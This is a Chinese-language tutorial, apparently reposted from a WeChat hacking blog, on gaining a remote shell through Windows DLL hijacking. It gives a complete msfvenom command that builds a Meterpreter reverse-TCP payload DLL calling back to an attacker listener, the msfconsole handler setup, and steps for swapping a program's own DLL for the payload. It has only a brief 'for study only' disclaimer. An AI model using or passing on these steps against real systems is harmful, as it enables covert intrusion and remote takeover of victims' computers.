通过劫持Dll文件来获得Shell

本文我们简单的介绍一种DLL劫持的方法来获取目标Shell。注意本文仅供学习和研究,坚决反对一切危害网络安全的行为。造成法律后果自负!

什么是DLL

在我们普遍认为,windows下的程序都是exe文件。其实不然,在windows中很多程序并不是一个完整的exe。他可能会分割成独立的多个动态链接库dll文件。当我们运行exe文件时,随之相应的dll文件也会调用。

因此,我们可以生成相关的dll文件,当程序运行时通过调用dll文件从而获得系统shell

获取调用的Dll

我们可以利用火绒中自带的工具,火绒剑来查看程序调用的Dll文件都有哪些。

通过劫持Dll文件来获得Shell需要注意的是,我们尽量去动用软件自身调用的dll文件,不要动系统的dll文件。以免造成系统异常。

生成shell

我们利用msfconsole生成一个dll文件,命令如下:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.123.43 lport=4444 -f dll -o kali.dll
通过劫持Dll文件来获得Shell

配置监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp 
set LHOST 192.168.123.43
set LPORT 4444
exploit

将原来的文件的dll文件进行备份。让后将生成的dll文件重命名源文件,进行替换。

通过劫持Dll文件来获得Shell运行程序后,我们成功得到会话。

通过劫持Dll文件来获得Shell因为是调用了其中一个dll文件,软件是可以正常运行的,但和此dll文件相关的功能可能会异常。

更多精彩文章 欢迎关注我们

原文始发于微信公众号(kali黑客笔记):通过劫持Dll文件来获得Shell

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/152340.html

(0)
小半的头像小半

相关推荐

发表回复

登录后才能评论
极客之音——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!